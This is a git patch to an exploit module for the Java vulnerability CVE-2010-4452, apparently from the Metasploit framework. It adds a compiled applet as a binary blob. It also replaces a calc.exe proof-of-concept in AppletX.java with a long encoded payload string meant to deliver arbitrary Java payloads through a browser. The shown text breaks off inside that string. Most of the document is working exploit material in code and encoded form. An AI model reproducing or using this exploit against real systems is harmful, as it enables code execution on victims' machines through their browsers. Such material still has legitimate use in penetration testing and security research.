From fb6107ffb50751abc07255f11ff3b93decde4f72 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 17 Mar 2011 23:57:11 +0000 Subject: [PATCH] enable java payloads, currently via one-off method git-svn-id: file:///home/svn/framework3/trunk@12012 4d416f70-5f16-0410-b530-b9f4589650da --- data/exploits/cve-2010-4452/AppletX.class | Bin 748 -> 13600 bytes .../exploits/cve-2010-4452/AppletX.java | 197 +++++++++++++++++- .../exploits/cve-2010-4452/get_offsets.rb | 10 +- .../windows/browser/java_codebase_trust.rb | 72 ++++--- 4 files changed, 243 insertions(+), 36 deletions(-) diff --git a/data/exploits/cve-2010-4452/AppletX.class b/data/exploits/cve-2010-4452/AppletX.class index 855971ad9860885e6ac3dbc8017618b79d57d921..1d68a8185418b29a5baab91ad2edd2fe11ac3eb0 100644 GIT binary patch literal 13600 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 Wid09Hm^K_N)ALv%MTNLIEdK^~7oo@i diff --git a/external/source/exploits/cve-2010-4452/AppletX.java b/external/source/exploits/cve-2010-4452/AppletX.java index 14c67da29c..76bd8cc245 100644 --- a/external/source/exploits/cve-2010-4452/AppletX.java +++ b/external/source/exploits/cve-2010-4452/AppletX.java @@ -1,19 +1,198 @@ public class AppletX extends java.applet.Applet { + @SuppressWarnings("unchecked") public void init() { - Process p = null; - System.out.println( "Executing" ); - try { - p = Runtime.getRuntime().exec( "calc.exe" ); - if( p == null ) - { - System.out.println( "Null process, crap" ); - } - p.waitFor(); +String CONFIG = "CONFIGZZ"; +String DATA = ("`f1J@mS#$,D@%=S:g##d<]4%ovA#$*Wc&;'sg4wlnv#%djF+A<**#$*c" + + "g%Yk%,##dWf+A<*.##mci+A<-1#$*um%?1?v#$+&o&AT0B;0Lh#I/Ek7w:#l7w32Y;NG1V#G4qaB=nXVB=hv/B=L=C##00`#EDwnCUjm" + + "XG/%J2HF7~2#Jac>Gc_cc.`Gi?I'%.~B=K4v=`A#pFL?/7(JFkGI'%.~B=KV,8UG*kH+ve" + + "-%nlwhHFeC(Dnor$$qp]8Dn9YK##.;,E0r&)26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlml" + + "u8>ePj>]iB@8PfCk#I.g]DjV&=H^~NeGd1_uEiriR&53,>CThuTFgZ>6##fTa),((3=MSL" + + "aHb4@68$QRJGed8&#Iw9X;KO?kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFn" + + "m#D[0.Ej#[N._g&:/o^kqI'%.~B=KV,=aOf&FL?/7;KY(;B>S)qFKKA9EfVli6,.KQ=]PN" + + ",Bte`3Ej~BO&PN5?C9;EOE-cQ>&v6>h2,$nOE,5MY26D&6D7X/qB=L>.vw#'']U/5-J" + + "V#$=r1&o@Vr-VPXd#,D62$;:K,FL>PtE*Erk#B0Zk;Pt13B>S)" + + "qFKKA8HClh+D7XH*1e~=C#$#$>28%BKQ" + + "?#$>;;#Hn-?CUjpYG/%J2HF7~2HEC_6&vM@ECeSDDE+f5U26D&68:,9m8$R0bJ#vb8Hb=6" + + "kGed8'&wMGcD+l9[F(>8TH*)2'DnBi.B:LX#B=hv/Ej%+0#JY>lB=8IWDgPp>6(JFkNB>A)vFguD8;LS)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]),((GB>S)qFKKA9DP/YvB>~Z3#I/*XCU4@OH*L)" + + "hCU7Ho/mnZ`B=:KdEdM6A27%24Dn^=q#DZs5;KNXWB>S)qFKKA9HClk,D7XH*#GNZ406@:" + + "w&PN50DmErgEfXeQ#JY>l;KPK6B>S)qFKKA9HClk,D7XH*:QAYEB=:L/H$`uHGemn)28s[" + + "THFn3tDnoktFc^L_FL>PtE0r)>26D&6D7X/qB=LS)" + + "qFKKA9HClk,D7XH*E0sjp26D&6D7X/qB=LS)qHEh@E;P$mF&ki=kB>S)qHEh@E;P$mFF]JK" + + "H=h81eBS)qFKKA9BU^ZkHEUnu#Grr8@<;ZV#,3Q:#%dj^####>#%djB#&+'" + + "~#&4-B##5/%#%djQ#&+'_#&4-B##5/%#$q:M#&O?d#$q:5#&O?f##kS+#&jQj#&sWI####" + + "###,)'#'0cp#'9iM#.jk=##G;.0TuK?0N%o`%8=0a#6?E01JK?.1(#U=(f^SJ#71ND~5-7" + + "=#87ML^0)(_~YTd>#4i7,&koT='hl'<#71N;#>~K;(JM9>##);,02)CM*)$?9###2($;;1" + + "<%nmaB'MK?^Q##$FK#u$dk###,&0m5`a;dKJ:%SXl" + + "s),.Jn)I=s%T4%a3#6tcC~oq4q#6P37(jE3()bd~~_-6p20VoOg]i4wB#Q,BA[S9L(###/" + + "'5thbl'hfKK5tiM,.SL^`5tj7A5>2qu5tj=C#>>w=##$IL&54QW,>8)@,YSDG,tnYL-;4q" + + "R-VP@~-qkmi.82>2&##$IL#>>>**_ZQ;##$=H#>>,$##$^S2bX9V`f1J@m" + + "S#$0Yd%MSo`##iWII7swo#$/oN&JtLRdnHTA&K1XXdnBvM#+km*ek?Av#+km+fLuQ$#$:k" + + "9F%crh#$02V&Kh(4gIr#Z&L%3ah+S5~&L7?chb7lj##bM4iCjV9##sA]j@fk=##bM4jwH." + + "C#$0~d&M='BktD=c%kmum#$0hh&Ma?5m7~[,&MsJrmn=m.&N0VudS(ff&N9~vnk:31#&O?" + + "N-VOn<##swop.P``#'KuWiCjVP#$1:u&O-8Ki_1h*&O6>*qb.5u#=8E$r_*Sp&Oc~/s@cH" + + "q&Ouh1swJGl#=wo+t=]5*##YD(#####&KD$Z#>G2&#AjHO###2*######?55;$;Ce3%oE@" + + ":%8@%2#>tS4%nv:<#ESpr&PWL@#Ef't9M>e*#$)1;&L[XPtY%?f#ESpr'hnpH%U9$D#?2:" + + ">;G7F6#$)CA&7>O9)biw0&7PZKdnE~D&7Y`M*_fR:&7klN+AGp@&8)#PdnEnJ&82)QdnEt" + + "L#GhE2,Y~Mf%;PuQ#?2gMAkWPY#?/iMAP&u8=wpbU#CZY`3(s[_#$+c/&>K8b?;31Y#CZY`3(s[c#?4l2$r%):#?>#" + + "5&?5c?APFp`#G1v+B2&ZC#G1v+Bh~lG%^5tC#?,2<%86f<<3&rs#E_`ME0q8A26D&6D7X/" + + "qGed776*kIH<`B''AX$/`#Fn5b=d91p?Bmge?qgW*:Jq0sS)qFKKA9EfVli6,.KQ=]GH+DSU/=Bsi&" + + "tBk[QOH+ve-I'%.4FgWL,HEBSaG.L8WHCo<*F00#tBk@?LH+ve-I'%.4FgWL,HGNC+=ho1" + + "&B/DuE0qow.]mm+D7X/qGed7,#IA$;:K" + + "8FL>Pt/n+fbB=:LAEdM6A27%24Dn^=q08F2]&53,/CThuTFgZ>6#?,]b%nm#?HFn+.B>/K" + + "4=~Jk=B=:KcDgPp>FHnN$=ho1&BS)qFKKA9HClk,D7XH*#GNZ4CU4RUCVEEdBsDoTBWZC&##/[KE0r&" + + "(26D&6D7X/qGed776*kIHB=:KdEdM6A27%24Dn^=q#DZs5C97nJHGi7dDng2)##/vWFL>^" + + "j8wIU.##0-UE0r&626D&6D7X/qGed776*kIHI'%.~B=KV,=aOf&FL?/7;KY(;B>S)q27mR" + + "ZCUe)O%nlwhF1uS6J@04*-qjZVB=:KcEdM6A27%24Dn^=q08F2]I'%.~FgWm7Ej~An##.1" + + "oH*q0kHEUo)/opwsI'%.~B=KV,=aOf&FL?/7@S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/qB=L,##/vWI'%..B=KV,<-r8vB=L=" + + "NCQNV^Hb2b_G`cOX'#&;.E(t%N#QFd9~P*FN##2I.I'%.$HGM8HDiucq#?YQW#IXZiC3fwd##0-UHEh=#EkHJ*1r*hI'#7q" + + "iMbUN]#LWWbN_Kr@##0_S##-aTI'%.(FgWm7Ej~AnHGNCl=ho1&B-v?&ki:0Ptd9C'&3LrQq`]IE*NBI26D&6D7X/qGed77#IA<~#RLMIBmC%" + + "hH+ve-DST]'#N#PoRnX.U#N>brSkTX`#?-snTM5jd#?[Hw#QOkuu^'(5l2X%fBo#P%n-+%u_:B>S)qDnpLPHClk1D7XH*CU~5bCW:)0&PN5" + + "LElDIe-Epq##AbuIHCk^O>0C~P*EX#?[p/'(uA/E(vB;F'~iNH*)2" + + "'DnBi.B:LX#B=hv/'2/G@CT_NHC9_<`D67o^^e>0O##2^5I'%.'FgWm7HEBSlG.L8WHCo<" + + "*F00#t#QFd9+%u^]B>S)qBsD`9HF7e>CRd',H*qM5FLu83+~Vp]B>S)qBsD`9HF7e>EfDa" + + "$Gd1)bH+w(6&wVwvZV@N*E,#AW26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu*_ZUUB>S)" + + "qBsD`9HF7e>FcS3)Fe<6ZCThd)E***E26D&628EeE#FJDmDmBXP225~^##-b-I'%..CVMO" + + "7Dn^A-BmY-N28F7IHG3s]BshQj&vZPjZq[l1#QFd9[S72;#?[v1')hq?~kTM8#QXs<(eau" + + "BB>S)qElDJ01pCE1D67p)#?WUn#Qt2@HG9Ve#JbAlB=8=SEdM6A27%24H*(nR[S.+S##27" + + "(I'%.'FgWj6HEBSkG.L8WHCo<*F00#t#5nO6)GC2S)q1qRIXG//6wHCo<*F00#t#5wU" + + "7),();B=:LAEdD0@1p_)3Dn^=q&r1,@^eM@DE*NBI26D&6D7X/qE3;un%DZJg#?~TB#RLP" + + "JB=8IWEdM6A27%24FhVOlEiriu),((GB>S)q27mRZFL?.hGed8'&wMGc`(dRA#R^ZFY=oB" + + "D#$@m/#P.s#H$]Ws`Cp]W##2m:Dlt`w`(UT~#$AQB#PJ0%CO-+e#$>Hb'+P$^M+tfjE*E<" + + "H26D&6Ej^#8B>@H&#$>ZS'+b0ba~BWV#7poJb=rEH##0_S#?WT_#SR7^1jT4,',1IUYYE5" + + "D#SmGQd7k&_#?]2S',^hmeP4=n#J0wKf1c](#?]DY'-I?.geH='#U9@^hFwF^#?]Y`'.*c" + + "2KMBowF]/9EB=]_?#?YQX%LE-`#?]_b'.Eu@j~=T9#4_b+'MJQ/DST]'G-Q+EHED4w#$>o" + + "f#P.rtDlj+F#>>0H%nlwhB>S)qF1Z+A)b^:IB>S)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]&53,>;nut~B>8N&##/[F;KXC*B>S)qFKKA9HClk" + + ",D7XH*)b^9tB=:KcEdM6A27%24Dn^=q08F2]%86f,<5<(]#I/-XCVC$WBru3o*)$CJ098J" + + "PI'%.~B=KV,=aOf&FL?/7##.1qG._6k#I&*~;KOHnB>S)qFKKA9HClk,D7XH*E0r)>26D&" + + "6D7X/qGed778@*3OCU.Qu##.2'=hAcbFL?/7),((I=MSLaHb4@68$QRJGed8&#Iw9X;KO?" + + "kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFnm#D[0.FgqQX##/X?E0r%o26D&" + + "6:O@#tHGORACVFnm08FDV),((8B>S)q27mRZHb=6kGed8'#Iw9XEj#XM#I/?lCU4CPFhU~" + + "tHG3t54wkw+B=:KcEdM6A27%24Dn^=q;MSo+B>S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/" + + "qGed776*kIHE*WHJ26D&6D7X/qHFc~)Gd1nrG#SHGCVOo%#Jb5P;KNXWB>S)qFKKA9HClk" + + ",D7XH*#F-a'B>OmWS)qFKKA9HClk,D7XH*&PN4jS)qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]I'%.~B=KV,-W1]9Y>5W#I/*_CTmwHCVXN$/l)IO##/9RHEh*sFh_CTCVY)4DST~~/oL_" + + "oI'%.~FgWm7Ej~AnE0r`%26D&6D7X/qGed776*kIH##/-NHEh*qCVF5WDj#4`##/[K;KXC" + + "&B>S)q27mRZCUe)O$qp~eDm4#t##00_E0r%h26D&69RC]q6*Y7D##/-NBS)q27mRZG//6wHCo<*F00#tB=:K" + + "vEdM6A27%24Dn^=q08F2](JFk6B>S)qFKKA9H_)n,F1$,2&53,>=MSLaDnp8:##/[L;KXC" + + "+B>S)qFKKA9H_)n,F1$,2##.1oCW'dj/kc;ZE0sj]26D&6D7X/qGed776*kIHB=:KdEdM6" + + "A27%24BtJDc6,.KUE*WHJ26D&6D7X/qFhU~/H+vq(D-?pDFHps_=ho1&B)c(/+bSB>S)qFKKA9IwJC1F0Ti3Db^::)b^:" + + "RI'%.~FgWm7G.L8%HCo<*F00#t#ttAb#JbK(E0qAD26D&6S)qFKKA9HClk,D7XH*>]iW'/l2OP#GNZBBrqSCHFvh&/meT_B=:KdFF.HC=aP8*CU[f" + + "q##.2)HEh*sG//6wHCo<*F00#t/n=rdB=:KdDgPp>H^c~1HGORGCVFnm#D[0.;KO9iB>S)" + + "qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]&PN50FMVn/EP#2q#JY/k06@:w%nlw" + + "vHGjC9CU~5b#ttB@#I%aN;KNp_B>S)qBsD`9HF7e>CRd',H*qM5FLu83#GNZ4;KOZtB>S)" + + "qHEh@E;P$mFE0sjp26D&6H`q#*J&#dBGd1b8CQC-oCpeB/HEC~p>]i-C/r]j8I'%.~CVMO" + + "7Dn^A-8UGa.=g;MZBte`3E0r`%26D&6H`q#*J&#dBGd1)%H+w(68~/iXCUe3&FgZ>)>]i-" + + "LGZ+TH:Tw9B##03~BdkC##/-NCp@M^8[30NH+ve-/sQE@I'%.~B=KV" + + ",=aOf&FL?/78>ePcE0s4l26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu;KY(BB>S)qFKKA" + + "9EfVli6,.KQGZXrMEk?D-EfXeY#JY>l;KNUVB>S)qFKKA9EfVli6,.KQ##/-NIBd[$HG=?" + + "mCThWf/mnZ`B=:KdEdM6A27%24CUR]O#D[E7CU4=NHEg2i#I&-`;KP0-B>S)qFKKA9HClk" + + ",D7XH*E0sjp26D&6D7X/qB=L.7wRCTh0j/n=rdI'%.~FgWm7Dn]&)HCo<#F00#t#GNZ4I^')" + + "~H,+L=G#/0C#IJQu;KO6hB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qE3;un6,6vFGuXi" + + "KGcbqwGe8(0DHQsDFd[<_FeES)qDnpLPCSEK%Ge8(2Gu+KF#I/TmFh@f['2/GLB=qg#FhhG0B=(%M#>>0B+~Vp" + + "-;KY?YB>S)qFKKA9HClk,D7XH*CpJ2R#D[?7Ej5pSFKo~t#J`XN:NR=TB=:KdEdM6A27%2" + + "4CUR]O#D[E7;KOHnB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qGed778@*3OCU.Qu##.2" + + "'C:~+fCn#[a/l2OP#F-a5HbTkjGeeC5#IA8##.[AI'%-" + + "uHGM8H;L<5tEiiin%86f;;NjkJ#F&/^E0q8A26D&6Ej^#8BtI&q6*Y7wa6M,[ML-5~gB5]M]VT_4r," + + "V_5/;Y]ql-@$tTlO]P[`].:*Qh]NbIK#6PTB_,ECD+/L,a]l=Zn%Yc<6?YofY]m0j(%u)E" + + "7#6G3Q/ki^)#6ufb#6S+@]QFiw]Qk&l#6GH?)GISU#6tU#%qSms5^*5@#$_aO&r$].&nMD" + + "k?[)S_V+qJ]&S2MW)c$l`1JG5i+>j,w1eb>h?ZlGb#6P6Q0ipDi2-pZ3+++)#1eb>h%=J6" + + "i?[_wl^4-c$?_9/Y=b.2l%:o^L=`+6O]QaXe]Uo[;'S~ML#6GBV*)*f'#6GBV*)*f(^4cQ" + + ")_c&X#$)JeK?_7XG]N#hU?_8]L=]?8G%:oaM#vTHm(1@c9W&V`&E)cww(`)dgg+(#$G+'97h=A6/6#?ZY]_DhMr]qnY2%V8UC(j?:" + + "-#6Fq0]iQ(m#5qS+########%1##,)(#$q]VkiC#6wO<#6wDA#6wDBB3n`P$*F:@]rqGQ%:s'R5d:>%#88[" + + "u]MTQ1%t~Cs%gWJ[$Y9[0#6G6R#BhT5)c$f^]MobY5c&-tDbRTI#6G'M)c~f3hFjDL_.Nc" + + "L]ql-@E*`uW1L'ql]NbIK#6YZC+&Y.(ED3fK$tTa0_bt;e$)MKBc+3oaF^>S^?WR7@XgwN" + + "B#5wg1$Dg~Bc+F&cG?te`?WR7@Xh4ZD#5wg1$`-eEc+X2eGvUwb?WR7@XhFfF#5wg1#6Ii" + + "J$rn1j?blaZ=]$&B=a1(U$=sCIHq^uN(egj4$Y9L+?c2s[In[>+~&JF[###&$$V^~,##'5" + + "E##)O1#>>8(&59W<_b@^H]1`6/?q^Q(#YY;'<(m9q#6%;#,>=NU?W[=D~6/hE#6K9V]ZCe" + + "$#6GH?#6ZMmc$)k6#6u8Q#6S+@JkWI_(gI(Q(/20i0O=bk;T~wQ%SXlr-qq('#6ZOa##)8" + + "T&53(-_b@dJ]1`6/0h_RN#>>2&,tn;B?W[=D0NeDg~6K%G#3CD>Xj.Pg2-pGi]NbIK#5f*" + + ";######7CNB##,+:###%.##G;Y####'#6ZN,<)$*CMG1I5_.kKn#5g'O######7UZD##,+<###%.##G=6####)MbLbgN(g^e#6ZNR13ZIO#6HYd#6w>" + + "i$@#^NO%cj<<1Et$OA**<1QMP-5b7uf+4h-3Ow`;jX~o/jP?vNW#6G$L+wwEePYAN>&ko$" + + ",?YofY.SR=)#6HF`#4kp~$=t_u?.8ld_?g2C]ql-@$AJvn)c8Lv#6HD_.SQT#W_`k;$=sW" + + "L]~EMr+/=s%$XkPl]~WZ#MPHA=u1.n&-VV0/]MKKP#6PTB##)7M&53(-awT]V]1`6/%nv%" + + 